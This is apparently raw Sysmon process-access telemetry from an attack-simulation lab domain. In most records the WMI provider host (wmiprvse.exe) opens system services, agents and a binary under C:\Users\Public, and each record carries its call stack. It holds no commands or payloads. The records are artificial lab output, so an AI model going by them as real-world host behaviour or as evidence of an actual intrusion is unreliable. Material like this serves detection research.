15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 